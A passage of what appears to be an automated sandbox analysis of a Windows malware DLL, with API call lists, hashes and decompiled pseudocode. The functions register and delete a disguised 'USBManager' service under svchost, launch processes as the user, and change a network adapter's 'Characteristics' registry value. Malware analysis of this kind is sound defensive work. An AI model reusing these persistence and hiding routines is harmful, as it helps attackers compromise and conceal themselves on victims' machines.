                                                                                                                          • Part of subcall function 6F3328B0: DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                          • Part of subcall function 6F3328B0: FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                          • Part of subcall function 6F3328B0: FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                          • Part of subcall function 6F333C60: OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333CEF
                                                                                                                          • Part of subcall function 6F333C60: CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                          • Part of subcall function 6F333C60: ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333D95
                                                                                                                          • Part of subcall function 6F334CA0: wsprintfA.USER32 ref: 6F334CEC
                                                                                                                          • Part of subcall function 6F334CA0: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                          • Part of subcall function 6F334CA0: HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                          • Part of subcall function 6F334CA0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                          • Part of subcall function 6F334CA0: RegDeleteValueA.ADVAPI32(?,009973A5), ref: 6F334D42
                                                                                                                          • Part of subcall function 6F334CA0: RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        • SetWindowTextA.USER32(00000000,6F33D664), ref: 6F337F92
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337FB9
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33801E
                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 6F33802F
                                                                                                                        • CallWindowProcW.USER32(Function_00007790,00000000,000083FC,00000000), ref: 6F338041
                                                                                                                        • SetWindowLongW.USER32 ref: 6F33804F
                                                                                                                          • Part of subcall function 6F333610: CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                          • Part of subcall function 6F333610: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                          • Part of subcall function 6F333610: Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                          • Part of subcall function 6F333610: DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                          • Part of subcall function 6F333610: CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$CreateMemoryResourcewsprintf$FindWindowZero$CloseFileFreeOpenService$BlockDeleteEnvironmentExitLongManagerlstrcmp$AllocCallChangeConfig2DestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
                                                                                                                        • String ID: .pdll$Printer manager$UniPrint Manager
                                                                                                                        • API String ID: 2623091544-3698302044
                                                                                                                        • Opcode ID: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction ID: 5ac0fd2c4ae1d0d529d9b13a194f54f51ff00cb1a03183b8a530f83bacc646c9
                                                                                                                        • Opcode Fuzzy Hash: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction Fuzzy Hash: 30312773E08BB4BBDA20D7648C48F9B766CEB46732F10411AF614E61C0CB759821CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 97%
                                                                                                                        			E6F333930(void* __ebx, void* _a4) {
                                                                                                                        				long _v4;
                                                                                                                        				long _v8;
                                                                                                                        				CHAR* _t22;
                                                                                                                        				long _t26;
                                                                                                                        				int _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t47;
                                                                                                                        				signed int _t53;
                                                                                                                        				void* _t54;
                                                                                                                        				WCHAR* _t56;
                                                                                                                        				long* _t59;
                                                                                                                        
                                                                                                                        				if(_a4 == 0) {
                                                                                                                        					L19:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t56 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
                                                                                                                        				if(_t56 == 0) {
                                                                                                                        					L18:
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _a4);
                                                                                                                        					goto L19;
                                                                                                                        				}
                                                                                                                        				_v4 = 0;
                                                                                                                        				_t22 = GetCommandLineA();
                                                                                                                        				_v8 = 0;
                                                                                                                        				_t47 = E6F33A3D0(_t22,  &_v8);
                                                                                                                        				_t59 =  &(( &_v8)[2]);
                                                                                                                        				if(_t47 == 0) {
                                                                                                                        					L17:
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t56);
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				_t26 = _v8;
                                                                                                                        				if(_t26 <= 1) {
                                                                                                                        					L15:
                                                                                                                        					LocalFree(_t47);
                                                                                                                        					if(_v4 != 0) {
                                                                                                                        						_push( *_a4);
                                                                                                                        						E6F333610(_t56);
                                                                                                                        					}
                                                                                                                        					goto L17;
                                                                                                                        				} else {
                                                                                                                        					_t53 = 1;
                                                                                                                        					do {
                                                                                                                        						if(_t53 >= _t26 - 1) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        						if(lstrcmpiA( *(_t47 + _t53 * 4), "-svcr") == 0) {
                                                                                                                        							_t54 = E6F33A360( *((intOrPtr*)(_t47 + 4 + _t53 * 4)), 0, 0);
                                                                                                                        							_t59 =  &(_t59[3]);
                                                                                                                        							if(_t54 != 0) {
                                                                                                                        								_v4 = 1;
                                                                                                                        								_t33 = PathIsRelativeW(_t54);
                                                                                                                        								_t34 = M6F340520; // 0x996738
                                                                                                                        								if(_t33 == 0) {
                                                                                                                        									_t34 = 0x6f33d664;
                                                                                                                        								}
                                                                                                                        								wsprintfW(_t56, L"\"%s%s\"", _t34, _t54);
                                                                                                                        								_t59 =  &(_t59[4]);
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t54);
                                                                                                                        							}
                                                                                                                        							L14:
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						_t26 = _v8;
                                                                                                                        						L8:
                                                                                                                        						_t53 = _t53 + 1;
                                                                                                                        					} while (_t53 < _t26);
                                                                                                                        					goto L14;
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 6F33394D
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333950
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F333969
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F3339B8
                                                                                                                        • PathIsRelativeW.SHLWAPI ref: 6F3339E9
                                                                                                                        • wsprintfW.USER32 ref: 6F333A05
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 6F333A11
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 6F333A18
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F333A20
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333A46
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A49
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F333A57
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLocal$CommandLinePathRelativelstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "%s%s"$-svcr
                                                                                                                        • API String ID: 3712600073-2880469085
                                                                                                                        • Opcode ID: 41ac2d30ff39329dcc7d6feb90e40ccfb6124d89250d8f65a1b0d21e0cf0903c
                                                                                                                        • Instruction ID: f1d01fbdc56259cf6174f3107a5da33c84d4c0a8dae534f5d499deeda9a8a1b6
                                                                                                                        • Opcode Fuzzy Hash: 41ac2d30ff39329dcc7d6feb90e40ccfb6124d89250d8f65a1b0d21e0cf0903c
                                                                                                                        • Instruction Fuzzy Hash: C731D033D047A9EBDB10DB64CC4AF5ABBADEB46321F008519F855D7140D7B5E814CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334130() {
                                                                                                                        				char _v248;
                                                                                                                        				char _v256;
                                                                                                                        				void* _v260;
                                                                                                                        				char _v264;
                                                                                                                        				void* _t11;
                                                                                                                        				intOrPtr _t12;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t38;
                                                                                                                        
                                                                                                                        				_t11 = E6F333700("USBManager", 1);
                                                                                                                        				_t38 = _t37 + 8;
                                                                                                                        				if(_t11 == 0) {
                                                                                                                        					return _t11;
                                                                                                                        				}
                                                                                                                        				if(M6F340544 != 0) {
                                                                                                                        					_t18 =  *0x6f34047c; // 0x998bd0
                                                                                                                        					wsprintfA( &_v264, "%s\\%s%c%s", _t18, "svchost", 0, 0x6f33d543);
                                                                                                                        					_t38 = _t38 + 0x18;
                                                                                                                        					_v260 = 0;
                                                                                                                        					if(RegCreateKeyExA(0x80000002,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v260, 0) == 0) {
                                                                                                                        						RegDeleteValueA(_v260, "USBManager");
                                                                                                                        						RegCloseKey(_v260);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t12 =  *0x6f34047c; // 0x998bd0
                                                                                                                        				wsprintfA( &_v264, "%s\\%s%c%s", _t12, "svchost", 0x5c, "USBPortsManagerGrp");
                                                                                                                        				RegDeleteKeyA(0x80000002,  &_v256);
                                                                                                                        				wsprintfA( &_v256, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
                                                                                                                        				return RegDeleteKeyA(0x80000002,  &_v248);
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333719
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333725
                                                                                                                          • Part of subcall function 6F333700: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6F33373D
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33374F
                                                                                                                          • Part of subcall function 6F333700: ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                          • Part of subcall function 6F333700: Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337C0
                                                                                                                        • wsprintfA.USER32 ref: 6F33417A
                                                                                                                        • RegCreateKeyExA.ADVAPI32 ref: 6F3341A5
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,USBManager), ref: 6F3341B9
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3341C4
                                                                                                                        • wsprintfA.USER32 ref: 6F3341E6
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F3341FB
                                                                                                                        • wsprintfA.USER32 ref: 6F334216
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F334225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
                                                                                                                        • String ID: %s\%s%c%s$SYSTEM\CurrentControlSet%s%s%s$USBManager$USBPortsManagerGrp$\Services\$svchost
                                                                                                                        • API String ID: 2810420714-3733378816
                                                                                                                        • Opcode ID: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction ID: 2f59b7d4d38ac84626ff918008f14b1f1464015837a2f811c3e197cbb679d29c
                                                                                                                        • Opcode Fuzzy Hash: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction Fuzzy Hash: 2B21E7B3E007A8BBE610DF60CC41FAB37ADEB94719F00850CF65466180E675F518CBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334300() {
                                                                                                                        				char _v264;
                                                                                                                        				char _v364;
                                                                                                                        				int _v368;
                                                                                                                        				int _v372;
                                                                                                                        				char _v376;
                                                                                                                        				int _v380;
                                                                                                                        				int _v384;
                                                                                                                        				char _v388;
                                                                                                                        				int _v392;
                                                                                                                        				int _v396;
                                                                                                                        				int _v400;
                                                                                                                        				void* _v404;
                                                                                                                        				void* _v408;
                                                                                                                        				int _t49;
                                                                                                                        				int _t66;
                                                                                                                        				char* _t68;
                                                                                                                        				CHAR* _t83;
                                                                                                                        				int _t90;
                                                                                                                        
                                                                                                                        				_t68 = M6F340584; // 0x751730
                                                                                                                        				_t90 = 0;
                                                                                                                        				_v404 = 0;
                                                                                                                        				if(RegOpenKeyExA(0x80000002, _t68, 0, 0xf003f,  &_v404) != 0) {
                                                                                                                        					L18:
                                                                                                                        					return _t90;
                                                                                                                        				}
                                                                                                                        				_v396 = 0;
                                                                                                                        				_v372 = 0;
                                                                                                                        				_v368 = 0;
                                                                                                                        				_v384 = 0;
                                                                                                                        				if(RegQueryInfoKeyA(_v404, 0, 0, 0,  &_v396,  &_v372, 0,  &_v368,  &_v384, 0, 0, 0) != 0) {
                                                                                                                        					L17:
                                                                                                                        					RegCloseKey(_v404);
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				_t49 = _v396;
                                                                                                                        				if(_t49 <= 0) {
                                                                                                                        					goto L17;
                                                                                                                        				}
                                                                                                                        				_t66 = 0;
                                                                                                                        				if(_t49 <= 0) {
                                                                                                                        					L16:
                                                                                                                        					goto L17;
                                                                                                                        				} else {
                                                                                                                        					do {
                                                                                                                        						_v380 = 0x104;
                                                                                                                        						if(RegEnumKeyExA(_v404, _t66,  &_v264,  &_v380, 0, 0, 0, 0) != 0) {
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						_v408 = 0;
                                                                                                                        						if(RegOpenKeyExA(_v404,  &_v264, 0, 0x2001b,  &_v408) != 0) {
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						_v392 = 1;
                                                                                                                        						_v400 = 0x64;
                                                                                                                        						if(RegQueryValueExA(_v408, "ComponentId", 0,  &_v392,  &_v364,  &_v400) == 0) {
                                                                                                                        							_t83 = M6F3404D8; // 0x99b240
                                                                                                                        							if(lstrcmpiA( &_v364, _t83) == 0) {
                                                                                                                        								_v400 = 4;
                                                                                                                        								_v392 = 4;
                                                                                                                        								_v388 = 0;
                                                                                                                        								if(RegQueryValueExA(_v408, "Characteristics", 0,  &_v392,  &_v388,  &_v400) == 0) {
                                                                                                                        									_v376 = 0x89;
                                                                                                                        									if(_v388 == 0x89 || RegSetValueExA(_v408, "Characteristics", 0, 4,  &_v376, 4) == 0) {
                                                                                                                        										_t90 = 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						CloseHandle(_v408);
                                                                                                                        						if(_t90 != 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						L14:
                                                                                                                        						_t66 = _t66 + 1;
                                                                                                                        					} while (_t66 < _v396);
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        			}





















                                                                                                                        0x6f33442c
                                                                                                                        0x6f334441
                                                                                                                        0x6f334445
                                                                                                                        0x6f334455
                                                                                                                        0x6f33445d
                                                                                                                        0x6f334464
                                                                                                                        0x6f33446c
                                                                                                                        0x6f33448c
                                                                                                                        0x6f33448c
                                                                                                                        0x6f33446c
                                                                                                                        0x6f33445d
                                                                                                                        0x6f33442c
                                                                                                                        0x6f334496
                                                                                                                        0x6f33449e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3344a0
                                                                                                                        0x6f3344a0
                                                                                                                        0x6f3344a1
                                                                                                                        0x00000000
                                                                                                                        0x6f3344ab

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00751730,00000000,000F003F,?), ref: 6F334327
                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 6F334365
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 6F3343B0
                                                                                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001B,?), ref: 6F3343DA
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,ComponentId,00000000,?,?,00000000), ref: 6F334412
                                                                                                                        • lstrcmpiA.KERNEL32(?,0099B240), ref: 6F334424
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,Characteristics,00000000,?,?,00000000), ref: 6F334459
                                                                                                                        • RegSetValueExA.ADVAPI32(?,Characteristics,00000000,00000004,?,00000004), ref: 6F334482
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F334496
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3344B2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
                                                                                                                        • String ID: Characteristics$ComponentId$d
                                                                                                                        • API String ID: 678791777-1822972205
                                                                                                                        • Opcode ID: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction ID: 72e184dfbda02b7c6a03d0ee0fae8ea8f7c766a2a20a2d99791d41e314ad56d3
                                                                                                                        • Opcode Fuzzy Hash: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction Fuzzy Hash: 8751E0B2608395AFD320DF55D884EABBBFDFBC9B14F00491DB68596104E772E5098B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 50%
                                                                                                                        			E6F3312C0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				char _v264;
                                                                                                                        				char _v288;
                                                                                                                        				char _v300;
                                                                                                                        				intOrPtr _v304;
                                                                                                                        				char _v308;
                                                                                                                        				long _v312;
                                                                                                                        				char* _t18;
                                                                                                                        				void* _t20;
                                                                                                                        				char* _t28;
                                                                                                                        				char* _t32;
                                                                                                                        				char* _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				intOrPtr _t43;
                                                                                                                        				long* _t48;
                                                                                                                        
                                                                                                                        				_t18 =  &_v300;
                                                                                                                        				_push(_t18);
                                                                                                                        				_push(0xffffffff);
                                                                                                                        				_push(E6F3310E0);
                                                                                                                        				_push(E6F3310D0);
                                                                                                                        				_push(E6F3310A0);
                                                                                                                        				_push(E6F331070);
                                                                                                                        				_push(E6F331000);
                                                                                                                        				_push(E6F331050);
                                                                                                                        				_push(E6F331030);
                                                                                                                        				_v312 = 0;
                                                                                                                        				L6F33C3A2();
                                                                                                                        				_t40 = _t18;
                                                                                                                        				_t48 =  &(( &_v312)[9]);
                                                                                                                        				if(_t40 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t32 = _a4;
                                                                                                                        					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
                                                                                                                        					_t42 = _t20;
                                                                                                                        					if(_t42 != 0xffffffff) {
                                                                                                                        						_push( &_v288);
                                                                                                                        						_push(_t42);
                                                                                                                        						_push(_t40);
                                                                                                                        						L6F33C39C();
                                                                                                                        						_t48 =  &(_t48[3]);
                                                                                                                        						CloseHandle(_t42);
                                                                                                                        						if(_t20 != 0) {
                                                                                                                        							_t43 = _a12;
                                                                                                                        							if(_t43 != 0) {
                                                                                                                        								_v312 = GetTickCount();
                                                                                                                        								 *0x6f340270 = RtlRandom( &_v312);
                                                                                                                        							}
                                                                                                                        							lstrcpyA( &_v264, _t32);
                                                                                                                        							PathRemoveFileSpecA( &_v264);
                                                                                                                        							PathAddBackslashA( &_v264);
                                                                                                                        							_push( &_v308);
                                                                                                                        							_push(0);
                                                                                                                        							_push(E6F331100);
                                                                                                                        							_push(0);
                                                                                                                        							_push( &_v264);
                                                                                                                        							_v304 = _a8;
                                                                                                                        							_v308 = _t43;
                                                                                                                        							_t28 = PathFindFileNameA(_t32);
                                                                                                                        							_push(_t28);
                                                                                                                        							_push(_t40);
                                                                                                                        							L6F33C396();
                                                                                                                        							_t48 =  &(_t48[7]);
                                                                                                                        							_v312 = _t28;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_push(_t40);
                                                                                                                        					L6F33C390();
                                                                                                                        					return _v312;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • #20.CABINET(Function_00001030,Function_00001050,Function_00001000,Function_00001070,Function_000010A0,Function_000010D0,Function_000010E0,000000FF,?), ref: 6F3312F8
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 6F331323
                                                                                                                        • #21.CABINET(00000000,00000000,?), ref: 6F33133C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F331347
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33135D
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33136C
                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 6F33137D
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(?), ref: 6F331388
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F331393
                                                                                                                        • PathFindFileNameA.SHLWAPI(?,?,00000000,Function_00001100,00000000,?), ref: 6F3313BC
                                                                                                                        • #22.CABINET(00000000,00000000), ref: 6F3313C4
                                                                                                                        • #23.CABINET(00000000), ref: 6F3313D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4034828233-0
                                                                                                                        • Opcode ID: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction ID: cd652085a27cf96906f9469b9a9188b614a61b72a552f45f733ec9de68303c36
                                                                                                                        • Opcode Fuzzy Hash: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction Fuzzy Hash: 5731D473D043A46FC620EB65DC44FAFB7ACAB85770F004A1DF59893180EB75E5148BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 54%
                                                                                                                        			E6F334760() {
                                                                                                                        				char _v8;
                                                                                                                        				char _v12;
                                                                                                                        				char _v16;
                                                                                                                        				char _v24;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				signed int _v32;
                                                                                                                        				char _v36;
                                                                                                                        				void* _v44;
                                                                                                                        				intOrPtr _v48;
                                                                                                                        				void* _v52;
                                                                                                                        				intOrPtr _v60;
                                                                                                                        				char _v64;
                                                                                                                        				intOrPtr* _v68;
                                                                                                                        				char _v76;
                                                                                                                        				intOrPtr _v80;
                                                                                                                        				void* _v84;
                                                                                                                        				WCHAR* _v92;
                                                                                                                        				intOrPtr* _v104;
                                                                                                                        				intOrPtr* _v112;
                                                                                                                        				intOrPtr* _v120;
                                                                                                                        				intOrPtr* _v128;
                                                                                                                        				intOrPtr* _v136;
                                                                                                                        				intOrPtr* _v144;
                                                                                                                        				intOrPtr* _v148;
                                                                                                                        				intOrPtr _v152;
                                                                                                                        				intOrPtr* _v160;
                                                                                                                        				char* _t80;
                                                                                                                        				intOrPtr* _t82;
                                                                                                                        				intOrPtr* _t85;
                                                                                                                        				intOrPtr* _t88;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				intOrPtr* _t95;
                                                                                                                        				char* _t98;
                                                                                                                        				intOrPtr _t99;
                                                                                                                        				intOrPtr* _t100;
                                                                                                                        				intOrPtr* _t102;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				intOrPtr* _t106;
                                                                                                                        				intOrPtr* _t108;
                                                                                                                        				intOrPtr* _t110;
                                                                                                                        				intOrPtr* _t112;
                                                                                                                        				intOrPtr* _t115;
                                                                                                                        				intOrPtr* _t117;
                                                                                                                        				intOrPtr* _t120;
                                                                                                                        				int _t123;
                                                                                                                        				intOrPtr* _t124;
                                                                                                                        				intOrPtr* _t126;
                                                                                                                        				WCHAR* _t128;
                                                                                                                        				intOrPtr* _t130;
                                                                                                                        				intOrPtr* _t132;
                                                                                                                        				signed int _t134;
                                                                                                                        				intOrPtr* _t138;
                                                                                                                        				intOrPtr* _t161;
                                                                                                                        				char _t185;
                                                                                                                        				void* _t186;
                                                                                                                        				char _t189;
                                                                                                                        				char _t190;
                                                                                                                        				signed int* _t191;
                                                                                                                        				WCHAR* _t194;
                                                                                                                        
                                                                                                                        				_t80 =  &_v16;
                                                                                                                        				_t185 = 0;
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v8 = 0;
                                                                                                                        				_v16 = 0;
                                                                                                                        				__imp__CoCreateInstance(0x6f33e0bc, 0, 1, 0x6f33e07c, _t80);
                                                                                                                        				if(_t80 < 0) {
                                                                                                                        					L35:
                                                                                                                        					return _v32;
                                                                                                                        				}
                                                                                                                        				_t82 = _v36;
                                                                                                                        				_v24 = 0;
                                                                                                                        				_push( &_v24);
                                                                                                                        				_push(_t82);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
                                                                                                                        					L10:
                                                                                                                        					_t85 = _v44;
